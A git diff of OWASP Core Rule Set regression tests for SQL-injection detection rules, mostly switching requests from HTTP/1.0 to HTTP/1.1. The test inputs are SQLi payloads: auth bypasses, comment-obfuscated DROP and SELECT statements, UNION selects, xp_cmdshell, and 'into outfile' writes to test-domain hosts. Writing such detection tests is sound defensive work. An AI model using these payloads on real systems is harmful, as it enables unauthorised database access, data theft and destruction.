diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
index b8e732451..1638692a3 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=(((((())))))&var2=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942430]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml
index 0254f2112..89bb3b273 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=-------------------&var2=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942431]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
index 0a34adce1..87b75ece2 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=;;dd foo bar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942432]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml
index 7af45734d..5aa27383d 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=DROP%20sampletable%3b--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942440]
@@ -30,7 +30,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=' or 1=1;%00"
         output:
@@ -47,7 +47,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=OR 1# "
         output:
@@ -64,7 +64,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=admin'--"
         output:
@@ -81,7 +81,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=DROP/*comment*/sampletable"
         output:
@@ -98,7 +98,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=DR/**/OP/*bypass deny listing*/sampletable"
         output:
@@ -115,7 +115,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members"
         output:
@@ -132,7 +132,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename"
         output:
@@ -149,7 +149,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=' or 1=1# "
         output:
@@ -166,7 +166,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=‘ or 1=1-- -"
         output:
@@ -183,7 +183,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=‘ or 1=1/*"
         output:
@@ -200,7 +200,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=1='1' or-- -"
         output:
@@ -217,7 +217,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=' /*!50000or*/1='1"
         output:
@@ -234,7 +234,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=' /*!or*/1='1"
         output:
@@ -251,7 +251,7 @@ tests:
             Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
           method: "POST"
           port: 80
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           uri: "/post"
           data: "test=0/**/union/*!50000select*/table_name`foo`/**/"
         output:
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml
index bf0f304cd..51520c847 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml
@@ -16,7 +16,7 @@ tests:
           method: POST
           uri: "/post"
           data: "var=%5c0xf00dsdfdsa"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942450]
@@ -33,7 +33,7 @@ tests:
           method: POST
           uri: "/post"
           data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942450]
@@ -50,7 +50,7 @@ tests:
           method: POST
           uri: "/post"
           data: "var=select%200x616263"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942450]
@@ -67,7 +67,7 @@ tests:
           method: POST
           uri: "/post"
           data: "var=IHRlc3Q0xAcF"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942450]
@@ -84,7 +84,7 @@ tests:
           method: POST
           uri: "/post"
           data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942450]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
index 3496a13e4..46ef15a2c 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=nvarchar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=xp_cmdshell"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
@@ -50,7 +50,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=varchar"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
@@ -67,7 +67,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=xp_dirtree"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
@@ -84,7 +84,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=xp_regread"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
@@ -101,7 +101,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=sp_password"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
@@ -118,7 +118,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=UTL_HTTP"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
@@ -135,7 +135,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=OPENROWSET"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
@@ -152,7 +152,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=sp_executesql"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
@@ -169,7 +169,7 @@ tests:
           port: 80
           uri: "/post"
           data: "sp_executesql"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
@@ -185,7 +185,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=1%2bcurrent_user::int"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942470]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml
index cf93c29b3..c774ba459 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml
@@ -17,7 +17,7 @@ tests:
           port: 80
           # variable name boundary attacks
           uri: "/get?'msdasql'"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -36,7 +36,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -53,7 +53,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -70,7 +70,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -87,7 +87,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=0.3480567293179807' UNION ALL select NULL --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -104,7 +104,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=config.ini\") UNION ALL select NULL --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -121,7 +121,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=CRS) UNION ALL select NULL --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -138,7 +138,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=CRS3\") UNION ALL select NULL --"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -154,7 +154,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -170,7 +170,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -187,7 +187,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
@@ -203,7 +203,7 @@ tests:
           method: GET
           port: 80
           uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942480]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml
index 910071cd0..c7b1d3635 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=%22%60%20%2A%20123"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "' ', 10"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -50,7 +50,7 @@ tests:
           port: 80
           uri: "/post"
           data: "'', '', '', '', '', '', '', '', 13"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -67,7 +67,7 @@ tests:
           port: 80
           uri: "/post"
           data: "`>65"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -84,7 +84,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay='1001'='10"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -101,7 +101,7 @@ tests:
           port: 80
           uri: "/post"
           data: "\"2562*23"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -118,7 +118,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=\":[\"00"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -135,7 +135,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=`>6fbdec2"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -152,7 +152,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay='][0]]), strtolower($b[$GLOBALS['"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -169,7 +169,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=', 2, 1"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -186,7 +186,7 @@ tests:
           port: 80
           uri: "/post"
           data: "`>9e7"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -203,7 +203,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=\":\"65"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -220,7 +220,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay='\\2nq5"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -237,7 +237,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=` < 0) AND `"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -254,7 +254,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay='0:0:6"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -271,7 +271,7 @@ tests:
           port: 80
           uri: "/post"
           data: "\":60"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -288,7 +288,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=\">%5 - type_submit_reset_5"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -305,7 +305,7 @@ tests:
           port: 80
           uri: "/post"
           data: "\":35"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -322,7 +322,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay='3085'='30"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -339,7 +339,7 @@ tests:
           port: 80
           uri: "/post"
           data: "\":\"[0,\\x22"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -356,7 +356,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay='16/17"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
@@ -373,7 +373,7 @@ tests:
           port: 80
           uri: "/post"
           data: "\";}7b6"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942490]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml
index 54e148077..510b076e4 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942500]
@@ -32,7 +32,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942500]
@@ -80,7 +80,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942500]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml
index 622884924..cdf7d6573 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?`bla`"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942510]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?'bla'"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942510]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml
index a2096ccbe..3e20cc009 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?`bla`"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942511]
@@ -31,7 +31,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?'bla'"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942511]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml
index be7dd030a..8e1a5dad2 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml
@@ -17,7 +17,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=id'is%20not-id--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -34,7 +34,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=id'is%20notes"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942520]
@@ -51,7 +51,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=id'not%20like%20id--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -68,7 +68,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=id'not%20glob-id--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -85,7 +85,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=id'not%20glob-id--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -103,7 +103,7 @@ tests:
           uri: "/post"
           # x'|email--
           data: "var=x'%7Cemail--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -121,7 +121,7 @@ tests:
           uri: "/post"
           # x'-email--
           data: "var=x'-email--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -139,7 +139,7 @@ tests:
           uri: "/post"
           # x'+email-- (there seem to be a bug with double encoding in tests)
           data: "var=x'%252Bemail--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -157,7 +157,7 @@ tests:
           uri: "/post"
           # x'^email--
           data: "var=x'%5Eemail--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -175,7 +175,7 @@ tests:
           uri: "/post"
           # x'@email--
           data: "var=x'%40email--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942520]
@@ -193,7 +193,7 @@ tests:
           uri: "/post"
           # x'&email--
           data: "var=x'%26email--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -211,7 +211,7 @@ tests:
           uri: "/post"
           # x'<email--
           data: "var=x'%3Cemail--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -229,7 +229,7 @@ tests:
           uri: "/post"
           # x'>email--
           data: "var=x'%3Eemail--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -247,7 +247,7 @@ tests:
           uri: "/post"
           # x'=email--
           data: "var=x'%3Demail--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -265,7 +265,7 @@ tests:
           uri: "/post"
           # x'/email--
           data: "var=x'%2Femail--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -283,7 +283,7 @@ tests:
           uri: "/post"
           # x'%email--
           data: "var=x'%25email--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -301,7 +301,7 @@ tests:
           uri: "/post"
           # x'~email--
           data: "var=x'~email--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942520]
@@ -318,7 +318,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=x'%20mod%20id--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -335,7 +335,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var='sounds%20like%20rowid--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
@@ -352,45 +352,11 @@ tests:
           port: 80
           uri: "/post"
           data: "var='%2F**%2F*2--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
   - test_id: 21
-    desc: "Integration test: 942521 blocks foo'or'oof"
-    stages:
-      - input:
-          dest_addr: 127.0.0.1
-          headers:
-            Host: localhost
-            User-Agent: "OWASP CRS test agent"
-            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          method: POST
-          port: 80
-          uri: "/post"
-          data: "var=foo'or'oof"
-          version: HTTP/1.0
-        output:
-          log:
-            expect_ids: [942521]
-  - test_id: 22
-    desc: "Integration test: 942522 blocks foo\\''or'oof"
-    stages:
-      - input:
-          dest_addr: 127.0.0.1
-          headers:
-            Host: localhost
-            User-Agent: "OWASP CRS test agent"
-            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-          method: POST
-          port: 80
-          uri: "/post"
-          data: "var=foo%5c''or'oof"
-          version: HTTP/1.0
-        output:
-          log:
-            expect_ids: [942522]
-  - test_id: 23
     desc: "Detect auth bypass email=' is not?--"
     stages:
       - input:
@@ -403,7 +369,7 @@ tests:
           port: 80
           uri: "/post"
           data: "email=%27%20is%20not%3F--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942520]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
index 29eec3976..7aacbd033 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
@@ -17,7 +17,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=a'or'a"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -34,7 +34,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=a'or?--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -51,7 +51,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=is%20this%20your%20parents'%20or%20yours?"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -68,7 +68,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=user'and%20id%20is%20not?--"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -85,7 +85,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=it%20is%20your%20parents'%20and%20yours"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942521]
@@ -102,7 +102,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=bob's%20or%20alice's"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -119,7 +119,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=mother%20or%20daughter"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -136,7 +136,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var='oreo"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -153,7 +153,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var='fork"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -170,7 +170,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var='%20for"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -187,7 +187,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=''or"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -204,7 +204,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=''or"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -221,7 +221,7 @@ tests:
           port: 80
           uri: "/post"
           data: "var=''or"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942521]
@@ -238,7 +238,7 @@ tests:
           port: 80
